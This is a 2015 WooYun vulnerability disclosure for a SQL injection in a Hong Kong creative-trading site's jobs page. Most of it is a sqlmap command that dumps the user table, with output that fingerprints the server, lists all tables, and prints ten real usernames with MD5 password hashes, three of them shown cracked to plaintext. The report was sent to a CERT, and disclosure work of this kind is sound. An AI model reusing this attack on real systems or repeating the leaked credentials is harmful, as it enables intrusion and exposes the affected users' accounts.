当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157731

漏洞标题:香港創意交易平台主站存在SQL注射漏洞(1W多名用户密码与邮箱)(香港地區)

相关厂商:香港創意交易平台

漏洞作者: 路人甲

提交时间:2015-12-03 11:35

修复时间:2015-12-08 11:36

公开时间:2015-12-08 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

香港創意交易平台主站存在SQL注射漏洞(1W多名用户密码与邮箱)

详细说明:

地址:http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883

$ python sqlmap.py -u "http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883" -p rid --technique=B --random-agent --batch  --no-cast -Danyidea_anyidea01 -T xoops_users -C uname,pass,name,email --dump --start 1 --stop 10


back-end DBMS: MySQL 5
Database: anyidea_anyidea01
+-------------+---------+
| Table | Entries |
+-------------+---------+
| xoops_users | 10364 |
+-------------+---------+


Database: anyidea_anyidea01
Table: xoops_users
[10 entries]
+-------------+-------------------------------------------+------+---------------------------+
| uname | pass | name | email |
+-------------+-------------------------------------------+------+---------------------------+
| yan_mcmug | 1610d99bbd13b300487c992cf35fa29c | | [email protected]**.**.**.** |
| nurikodomto | bb12b3dcc45be59fc8bde152a5e2d319 | | [email protected]**.**.**.** |
| leungkar | 1eaaaeebba29787989af2819ca811bbc | | [email protected]**.**.**.** |
| Vencent | bcbda11e419cca4dca93e0232bcf1ef1 | | [email protected]**.**.**.** |
| fly_design | c27b91c76443289c5754054bb0aad1cf | | [email protected]**.**.**.** |
| greatmoment | b427ebd39c845eb5417b7f7aaf1f9724 (zxcvbn) | | [email protected]**.**.**.** |
| otto | a152e841783914146e4bcd4f39100686 (asdfgh) | | [email protected]**.**.**.** |
| wilsonho | 990a1aeb1f5630064e5308716c308583 (102901) | | [email protected]**.**.**.** |
| gallium | 2235c41b8801fd450bc252961b4d40c0 | | [email protected]**.**.**.** |
| S.Y | 439cbba42741be50eff62c68880e86af | | [email protected]**.**.**.** |
+-------------+-------------------------------------------+------+---------------------------+

漏洞证明:

current user:    '[email protected]'
current user is DBA: False
database management system users [1]:
[*] 'anyidea_anyidea'@'localhost'
Database: anyidea_anyidea01
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| xoops_users_attributes | 39938 |
| xoops_anyidea_event | 32202 |
| xoops_jobs_resume | 17223 |
| xoops_users | 10364 |
| cdb_memberfields | 10352 |
| cdb_members | 10352 |
| xoops_groups_users_link | 10343 |
| xoops_users_20130711 | 8074 |
| cdb_posts | 6030 |
| xoops_xoopscomments | 4893 |
| cdb_attachments | 4573 |
| cdb_mythreads | 4217 |
| cdb_threads | 4037 |
| xoops_jobs_transaction | 3783 |
| check_code | 3298 |
| xoops_jobs_jobfaq | 3115 |
| xoops_jobs_vote | 1991 |
| cdb_onlinetime | 1666 |
| xoops_group_permission | 1567 |
| cdb_myposts | 1466 |
| xoops_users_auth | 1425 |
| xoops_catads_ads | 1133 |
| xoops_priv_msgs | 974 |
| xoops_jobs_listing | 941 |
| xoops_session | 512 |
| xoops_avatar | 495 |
| xoops_avatar_user_link | 495 |
| xoops_users_backup | 465 |
| cdb_rsscaches | 293 |
| xoops_xfguestbook_country | 240 |
| xoops_catads_departements | 237 |
| xoops_config | 233 |
| xoops_jobs_rss | 224 |
| xoops_configoption | 207 |
| xoops_stories | 193 |
| cdb_settings | 187 |
| cdb_statvars | 169 |
| xoops_tplfile | 147 |
| cdb_searchindex | 140 |
| xoops_lt_config | 139 |
| xoops_tplsource | 136 |
| supe_effects | 125 |
| supe_cache | 114 |
| cdb_threadsmod | 104 |
| cms_join_event | 96 |
| xoops_lt_users_permissions | 93 |
| xoops_lt_referers | 86 |
| xoops_catads_cat | 85 |
| cdb_subscriptions | 79 |
| xoops_lt_bayesian_tokens | 72 |
| supe_categories | 69 |
| xoops_lt_permissions | 66 |
| xoops_block_module_link | 61 |
| supe_settings | 59 |
| xoops_newblocks | 57 |
| cdb_polloptions | 53 |
| cdb_stats | 50 |
| xoops_catads_feedback | 48 |
| cdb_blogcaches | 44 |
| cdb_favorites | 40 |
| xoops_xoopsnotifications | 38 |
| cdb_pms | 37 |
| supe_prefields | 37 |
| xoops_users_industry | 36 |
| cdb_stylevars | 34 |
| xoops_jobs_categories | 32 |
| cdb_smilies | 29 |
| xoops_lt_article_categories_link | 28 |
| xoops_lt_articles | 28 |
| xoops_lt_articles_text | 28 |
| xoops_counter | 24 |
| cdb_forumfields | 23 |
| cdb_forums | 23 |
| cdb_moderators | 23 |
| xoops_catads_regions | 23 |
| supe_styles | 20 |
| xoops_content | 20 |
| xoops_smiles | 17 |
| cdb_usergroups | 15 |
| xoops_catads_options | 14 |
| xoops_smartfaq_answers | 14 |
| cdb_polls | 13 |
| xoops_smartfaq_faq | 12 |
| cdb_crons | 11 |
| xoops_lt_articles_categories | 11 |
| cdb_medals | 10 |
| cdb_sessions | 10 |
| cms_event_talk | 10 |
| supe_crons | 10 |
| xoops_modules | 10 |
| cms_event | 9 |
| supe_usergroups | 9 |
| cdb_bbcodes | 7 |
| cdb_buddys | 7 |
| xoops_configcategory | 7 |
| xoops_ranks | 7 |
| xoops_stats_userscreen | 7 |
| cdb_ratelog | 6 |
| supe_attachmenttypes | 6 |
| xoops_banner | 6 |
| xoops_bb_reads_forum | 6 |
| xoops_groups | 6 |
| xoops_lt_bayesian_filter_info | 6 |
| xoops_lt_blogs | 6 |
| xoops_xfguestbook_config | 6 |
| cdb_ranks | 5 |
| xoops_bb_forums | 5 |
| xoops_jobs_status | 5 |
| xoops_lt_articles_comments | 5 |
| xoops_smartfaq_categories | 5 |
| xoops_stats_usercolor | 5 |
| cdb_onlinelist | 4 |
| xoops_jobs_ttype | 4 |
| xoops_users_class | 4 |
| cdb_admingroups | 3 |
| xoops_bannerclient | 3 |
| cdb_adminsessions | 2 |
| cdb_failedlogins | 2 |
| cdb_words | 2 |
| xoops_bb_categories | 2 |
| xoops_bb_online | 2 |
| xoops_bb_reads_topic | 2 |
| xoops_ctem_pagelink | 2 |
| xoops_jobs_price | 2 |
| xoops_jobs_type | 2 |
| xoops_lt_users | 2 |
| xoops_online | 2 |
| xoops_topics | 2 |
| cdb_profilefields | 1 |
| cdb_styles | 1 |
| cdb_templates | 1 |
| cdb_threadtypes | 1 |
| cms_sys | 1 |
| cms_user | 1 |
| supe_robots | 1 |
| xoops_bannerfinish | 1 |
| xoops_bb_posts | 1 |
| xoops_bb_posts_text | 1 |
| xoops_bb_topics | 1 |
| xoops_imagecategory | 1 |
| xoops_imgset | 1 |
| xoops_imgset_tplset_link | 1 |
| xoops_jobs_res_categories | 1 |
| xoops_stories_votedata | 1 |
| xoops_tplset | 1 |
| xoops_xfguestbook_msg | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2490 |
| STATISTICS | 651 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| PARTITIONS | 275 |
| TABLES | 275 |
| KEY_COLUMN_USAGE | 250 |
| TABLE_CONSTRAINTS | 232 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 18 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 3 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: anyidea_anyidea01
Table: xoops_users_20130711
[1 column]
+--------+
| Column |
+--------+
| pass |
+--------+
Database: anyidea_anyidea01
Table: supe_members
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: anyidea_anyidea01
Table: cms_sys
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: anyidea_anyidea01
Table: xoops_users
[1 column]
+--------+
| Column |
+--------+
| pass |
+--------+
Database: anyidea_anyidea01
Table: cdb_members
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Databsqlmap resumed the following injection point(s) from stored session:
---
Parameter: rid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pa=viewResume&rid=00000000883 AND 5794=5794
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: anyidea_anyidea01
+-------------+---------+
| Table | Entries |
+-------------+---------+
| xoops_users | 10364 |
+-------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pa=viewResume&rid=00000000883 AND 5794=5794
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: anyidea_anyidea01
Table: xoops_users
[37 columns]
+-----------------+-----------------------+
| Column | Type |
+-----------------+-----------------------+
| level | tinyint(3) unsigned |
| actkey | varchar(8) |
| attachsig | tinyint(1) unsigned |
| bio | tinytext |
| class | tinyint(3) unsigned |
| contact | varchar(100) |
| email | varchar(60) |
| industry | tinyint(4) |
| last_login | int(10) unsigned |
| name | varchar(60) |
| notify_method | tinyint(1) |
| notify_mode | tinyint(1) |
| pass | varchar(32) |
| points_con | int(10) unsigned |
| points_pro | int(10) unsigned |
| posts | mediumint(8) unsigned |
| rank | smallint(5) unsigned |
| tel | varchar(50) |
| theme | varchar(100) |
| timezone_offset | float(3,1) |
| uid | mediumint(8) unsigned |
| umode | varchar(10) |
| uname | varchar(25) |
| uorder | tinyint(1) unsigned |
| url | varchar(100) |
| user_aim | varchar(18) |
| user_avatar | varchar(30) |
| user_from | varchar(100) |
| user_icq | varchar(15) |
| user_intrest | varchar(150) |
| user_mailok | tinyint(1) unsigned |
| user_msnm | varchar(100) |
| user_occ | varchar(100) |
| user_regdate | int(10) unsigned |
| user_sig | tinytext |
| user_viewemail | tinyint(1) unsigned |
| user_yim | varchar(25) |
+-----------------+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pa=viewResume&rid=00000000883 AND 5794=5794
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: anyidea_anyidea01
Table: xoops_users
[10 entries]
+-------------+-------------------------------------------+------+---------------------------+
| uname | pass | name | email |
+-------------+-------------------------------------------+------+---------------------------+
| yan_mcmug | 1610d99bbd13b300487c992cf35fa29c | | [email protected]**.**.**.** |
| nurikodomto | bb12b3dcc45be59fc8bde152a5e2d319 | | [email protected]**.**.**.** |
| leungkar | 1eaaaeebba29787989af2819ca811bbc | | [email protected]**.**.**.** |
| Vencent | bcbda11e419cca4dca93e0232bcf1ef1 | | [email protected]**.**.**.** |
| fly_design | c27b91c76443289c5754054bb0aad1cf | | [email protected]**.**.**.** |
| greatmoment | b427ebd39c845eb5417b7f7aaf1f9724 (zxcvbn) | | [email protected]**.**.**.** |
| otto | a152e841783914146e4bcd4f39100686 (asdfgh) | | [email protected]**.**.**.** |
| wilsonho | 990a1aeb1f5630064e5308716c308583 (102901) | | [email protected]**.**.**.** |
| gallium | 2235c41b8801fd450bc252961b4d40c0 | | [email protected]**.**.**.** |
| S.Y | 439cbba42741be50eff62c68880e86af | | [email protected]**.**.**.** |
+-------------+-------------------------------------------+------+---------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-08 11:36

厂商回复:

最新状态:

暂无